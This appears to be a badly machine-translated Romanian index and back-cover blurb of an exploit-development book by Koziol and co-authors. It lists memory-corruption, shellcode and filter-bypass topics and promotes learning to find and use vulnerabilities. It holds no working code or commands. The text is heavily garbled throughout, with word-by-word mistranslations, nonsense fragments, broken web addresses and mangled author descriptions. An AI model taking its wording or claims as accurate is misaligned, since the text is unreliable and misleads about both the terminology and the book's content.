analiză, dezechilibru, plus nup, accesibilitate vulnerabilități acces excepție, monopol, Drept, priza, descărcabil modul, de protecţie date cookie-uri, simbolic comparaţie, și identificator grupuri, utilizator, , selectiv analiză, instrumental analiză, vierme de internet, interpret, excepție, excepție acces, la cadru grămadă, canal intrare, retragere, catalog configurație descărcări, calitate, Clasă preferenţial selecţie, separare timp real timp fix prioritate, Alfabetic indicator CODUL implementat, , decriptare, mașinărie, , pozitional- independent, codificare, cod pagină, comanda CPU, , , componentă model obiecte, aspect, static, convenţie apel, DIN, stdcall, acest apel, final punct, Control de mai sus execuţie proces, Control sumă, Control punct, pușculiță, coșmar dll, o sută morman, , , recuperare, dinamic, definiție, revărsare, concept, proces, creare, tăcut, functionare, , l capcană, local memorie curgere, local vulnerabilitate, m maxim unitate transmitere, marker definiție, primar, actual curgere, matrice, scalabilitate, mașinărie Codul, , metodă Veneţian, , metodă nup, multithreading, , modificare cod pe etape execuţie, modul descărcabil, monitorizarea erori monopol acces, pod clădire, n moştenire, neexecutabil grămadă, , Nagla, algoritm, Descendentă analiză, caracter nul, despre Securitate calitate, detectare invazie, detectare invazii, coajă, tratament excepții , manipulator intermediar, real, manipulator excepții verso conexiune, înapoi apel, , ocol sisteme verificări introdus date, sisteme verificări intrare date, ocol filtre, general logic eroare, limitator, un singur factor exploata, Identificare semnătură, mediatizat apel, devastare, depanator, relativ virtual adresa, o sută eroare aplicare, singur deplasare, logic, monitorizarea, incorect completare linia, general, difuzare, revărsare tampon, repetate eliberare memorie, turnate la canonic minte verificări granițe, trece ambalaj, P punga de plastic actualizări, memorie local, curgere, primar marker, difuzat greșeli, suprascrie, imagini, comutarea biți mobil format, o sută revărsare, în miez, grămezi, , , , proces, grămadă, , , , întreg, Alfabetic indicator interceptare import, tehnică, prolog, , epilog, interceptare conexiuni, interceptare management, interceptor, repetate eliberare memorie, substituit funcţie, substituţie, independent de poziție Codul, Căutare în grămadă, semnătură, deplasare, structurilor proces, constructie pod, curgere program, , , pas cu pas intrare cod, privilegiu, examinare intrare, examinare introdus date, examinare granițe, aluneca, , program curgere, , , promovare, , , prolog, intermediar manipulator, trece terminator, protocol TCP/ R, fără a sustine state, Cu a sustine state, reţea, protocol priza, procedură extern, Drept acces la parametrii, R lucru Miercuri, distribuitor final puncte, extins Inregistreaza-te steaguri, curse w și rei în s th indica b comenzi, grămadă, Inregistreaza-te general destinaţie, segment, administrator, steaguri, reintrantwhitejust b, modul miez, reconstrucţie definiții clase DIN echilibrat copac, Colectie date, sesiune cheie, segment bss, date, text, segmentare Inregistreaza-te, secțiune, semnătură Identificare, semnătură detectare atacuri, semnătură Căutare, simbol alfanumerice, limitator, lat, protejat, simbolic Nume, sistem detectare invazii, , sistemică funcţie, , , sistemică monitoriza, sistemică Gateway, părtinire, , , , priză, , specificatorul format, comparaţie nesemnat, simbolic, miercuri lucru, stabilitate, static aspect, static analiză, grămadă, , neexecutabil, , revărsare, , grămadă cadru VR neconvențional, tradiţional, grămadă manipulator excepții paza, , pagină cod, linia format, , sistem rapid apel, criptare, t masa virtual functii, , descriptori întrerupe des mâinile Yurov, , pe re Domnul Cu G R unsprezece ro wa unsprezece n s X prelucrare și kov, imperiu, decalaje Ordin pe functii, och ka Intrare, Control, Alfabetic indicator trasarea vulnerabilitati, trasor, La indicator baza, cadru, , indicator cadru, treizeci tăcut morman, Control memorie administrator Inregistreaza-te, o scurgere informație, , memorie, resurse vulnerabil program, vulnerabilitate, accesibilitate, singur deplasare, descărcări module miez, simbolic comparatii, utilizare memorie in afara zone vizibilitate, după eliberare, local, incorect completare linii, enumerare descărcabil module, revărsare tampon, interceptare numit canale, repetate eliberare zdrobi, verificări granițe, trece terminator, format linii întreg revărsare, f fuzzer, , , , fuzz, , factor lipsa de încredere filtru, caractere Unicode, alfanumerice simboluri, filtru brut excepții format retragere, mobil, o sută format linia, , fragment memorie, funcţie virtual, , global, initializare, verso apel, , inlocuit, sistemic, , , X hacker, hashing, cod hash, gazdă, c întreg revărsare, , , ciclu, h vierme, , negru mutare, w hexazecimal reprezentare, larg simbol, criptare aditiv Poarta de acces capcane, sistem, zgomot, generator de zgomot, uh euristic, ecranare, ecranat simbol, exploata, , cu doi factori, un singur factor, exploatare vulnerabilități modul ecou, eu limba idl, Piton, SQL, Transact SQL, de nstz gay nămol, Și ttp:/ N StZL O G rg http ://!> KMPz ru Artă hacking și protecţie sisteme Petice pentru acoperi găuri în protecţie sisteme emis dezvoltatori zilnic in orice caz la la asta momentul când tu instalare un alt Actualizați, ta date deja Mai a fi atacat Acest unic carte va permite pentru tine trece înaintea neplăcut evoluții La tu va aparea posibilitate găsi vulnerabilități programe, scris pe limba DIN, utilizare aceste vulnerabilități și împiedica aspect nou găuri în protecţie Carte scris grup experți pe Securitate niste din lor sunt logodiți întrebări Securitate corporative aplicatii, A niste sunt real Subteran hackeri LA listă de email-uri bugtraq, dedicat urmărire vulnerabilitati, lor opinie conteaza cel mai autoritar LA carte iluminat Toata lumea aspecte ale detectare găuri în protecţie sisteme Aruncă o privire pe Cuprins și asigurați-vă că în acest Atent studiu descris metode va permite pentru tine pe profesional nivel Test și proteja sisteme, Jack Koziol supraveghetor departament informativ Securitate corporații fhg, Chicago David Lichfield unu din fondatori NG Securitate Software Dave Eitel angajat Naţional agentii Securitate Chris Enley unu din fondatori NG Securitate Software A la fel utilizare disponibil vulnerabilități Tu învăța: • găsi cauze vulnerabilități și înlătura lor; • fără muncă dezvălui găuri în protecţie popular OS (inclusiv windows , Linux și solaris ) și aplicatii (inclusiv DOMNIȘOARĂ SQL Server Nil Mehta cheie figura departament pe luptă Cu vulnerabilitate sisteme în ISS X- forta Sinai Eren cu experienta cercetător Probleme Securitate și Oracol ); a ataca protejat sisteme și ocolire filtre - numai trecere acest etapă, poate sa a intelege, ce fel contramăsuri într-adevăr necesar asumă; muncă Cu descoperit vulnerabilități utilizare nedocumentat oportunități și metode Riley mai in varsta științific angajat companiilor ochi Digital Securitate Hassel NETz echipă „HTeia: SecurityHhacking „Xlevel utilizator: expert C^PPTER* ©WILEY wiley com ISBN - - - Ordin carti: , St Petersburg, și eu tel : ( ) - - , postbook@piter com , Harkov- , și eu tel : ( ) - - , peter@kharkov piter com NetZor org EXCLUSIV www piter com — toate informație despre cărți și magazin online